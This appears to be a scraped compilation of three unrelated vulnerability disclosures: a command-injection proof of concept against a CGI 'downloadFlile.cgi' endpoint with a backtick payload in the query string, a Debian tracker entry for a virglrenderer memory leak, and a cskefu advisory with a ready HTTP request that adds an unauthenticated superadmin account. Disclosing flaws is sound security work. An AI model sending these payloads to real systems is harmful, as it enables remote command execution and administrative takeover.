don't check the input of QUERY\_STRING and call system

**POC**

    GET /cgi-bin/downloadFlile.cgi?payload=`dw>../1.txt` HTTP/1.1 
    Host: 192.168.1.106
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 accept-language: zh-CN,zh;q=0.9
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0

CVE-2022-38511: CVE/downloadFile.md at main · whiter6666/CVE

A flaw was found in the VirGL virtual OpenGL renderer (virglrenderer). The virgl did not properly initialize memory when allocating a host-backed memory resource. A malicious guest could use this flaw to mmap from the guest kernel and read this uninitialized memory from the host, possibly leading to information disclosure.

**Name**

CVE-2022-0175

**Description**

memory initialization issue in vrend\_resource\_alloc\_buffer() can lead to info leak

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

virglrenderer (PTS)

buster

0.7.0-2

fixed

bookworm, sid, bullseye

0.8.2-5

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

virglrenderer

source

(unstable)

(not affected)

**Notes**

\- virglrenderer <not-affected> (Introduced in 0.9.0 with refactor)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2039003  
https://gitlab.freedesktop.org/virgl/virglrenderer/-/merge\_requests/654  
Code refactored in https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/7899e057327848300b18d8f03aa3789e00ed0221 (0.9.0)  
Fixed by: https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/b05bb61f454eeb8a85164c8a31510aeb9d79129c

CVE-2022-0175: CVE-2022-0175

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

Tag

#ubuntu